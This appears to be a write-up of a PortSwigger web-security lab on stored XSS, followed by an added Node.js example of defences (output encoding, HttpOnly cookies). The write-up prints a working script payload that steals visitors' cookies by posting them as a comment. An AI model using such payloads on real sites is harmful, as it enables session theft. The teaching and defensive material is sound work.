So in this challenge, we are going to use an XSS attack to exfiltrate user cookies. We have another example of a blog site that lets users comment on posts:
If we try XSS using a <script> tag, it works, which means we can simply insert our payload inside a <script> tag.
Now let's create a payload that gets the user's cookies. What we can do is:
- Send the user's cookies to a webhook or to our own site that collects them
- Show the cookies in the comment box
I tried the first solution, but the result was not what I expected: I only got a session but not the cookies we need to gain access, since it was a third party and PortSwigger didn't allow us to use a third-party app, so I tried the second solution. I created a payload that forces the user to post a comment to the blog; you can find the right endpoint and the needed data using intercept in Burp Suite. To post a comment, we need to get their CSRF token, which we can find in the <input> tag attribute.
This is my final payload:
<script>
window.onload = function(){
    // Read the CSRF token from the first <input> on the page
    const Token = document.getElementsByTagName('input')[0].value
    // Build the form-encoded comment body; the comment field carries document.cookie
    var data = 'csrf='+Token +'&'
    data += 'postId=10&'
    data += 'comment='+document.cookie+'&'
    data += 'name=DjumantotheAdmin&'
    data += 'email=roc@chic.com&'
    data += 'website=https://google.com'
    // Post the comment back to the blog from the victim's browser
    fetch('https://0a4500e6034e583480d12b22009f0070.web-security-academy.net/post/comment',
    {
        method: 'POST',
        mode: 'no-cors',
        body: data
    }
    )
};
</script>
So here's how the code works:
- We want to run it right after the page content is loaded, using the window.onload handler
- We take their CSRF token from the <input> tag
- We set the comment to their cookies
- We set the postId to the value of the current blog post, which is 10
And this is the result:
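The payload above works for two reasons: the blog echoes the stored comment into the page without encoding it, and the session cookie is readable from document.cookie. As an added example that is not part of the original writeup or of the lab, the Node.js snippet below shows the two fixes a defender would apply (HTML-encoding the comment on output, and setting HttpOnly on the session cookie) and checks that the stored comment becomes inert text and that the session value disappears from what page script can read. The comment text, cookie names and values are constructed for the demonstration.

```javascript
// Added example (not the lab's or the writeup author's code): the two controls that
// neutralise a cookie-stealing stored XSS. Runs under Node.js with no dependencies.

// Constructed sample: a stored comment containing a script element, as an attacker
// would submit it. It is only used as input to the renderers below.
const STORED_COMMENT =
  "<script>fetch('/post/comment', {method: 'POST', body: document.cookie})</script>";

// HTML-encode the five characters that can break out of element text or an attribute
// value. Applying this at render time is the fix for the vulnerable comment output.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable renderer: concatenates the comment straight into the markup, so a stored
// <script> element is interpreted by every visitor's browser.
function renderCommentVulnerable(comment) {
  return `<section class="comment"><p>${comment}</p></section>`;
}

// Hardened renderer: the same template, but the comment body is encoded first, so
// "<script>" survives only as literal text.
function renderCommentSafe(comment) {
  return `<section class="comment"><p>${escapeHtml(comment)}</p></section>`;
}

// Crude check used by the demonstration only: does the markup contain a script element?
// A real detector would parse the HTML; this is enough to compare the two renderers.
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// Build a Set-Cookie header with the attributes a defender wants on a session cookie.
// HttpOnly is the one that matters for this lab: script in the page cannot read it.
function sessionCookieHeader(name, value) {
  return `${name}=${value}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// Parse a Set-Cookie header into name, value and a map of lower-cased attributes.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((p) => p.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1), attrs: {} };
  for (const a of attrs) {
    const i = a.indexOf('=');
    if (i === -1) cookie.attrs[a.toLowerCase()] = true;
    else cookie.attrs[a.slice(0, i).toLowerCase()] = a.slice(i + 1);
  }
  return cookie;
}

// Model what document.cookie would return for a set of cookies: only those without
// HttpOnly are visible to script, so an exfiltration payload can only carry those.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Demonstration with constructed values.
console.log('vulnerable:', renderCommentVulnerable(STORED_COMMENT));
console.log('hardened:  ', renderCommentSafe(STORED_COMMENT));
console.log('document.cookie would show:',
  visibleToScript([sessionCookieHeader('session', 'constructed-session-value'),
                   'theme=dark; Path=/']));
```

Both controls are worth having: output encoding removes the injection, and HttpOnly limits the damage if some other injection point is missed. Neither replaces the other.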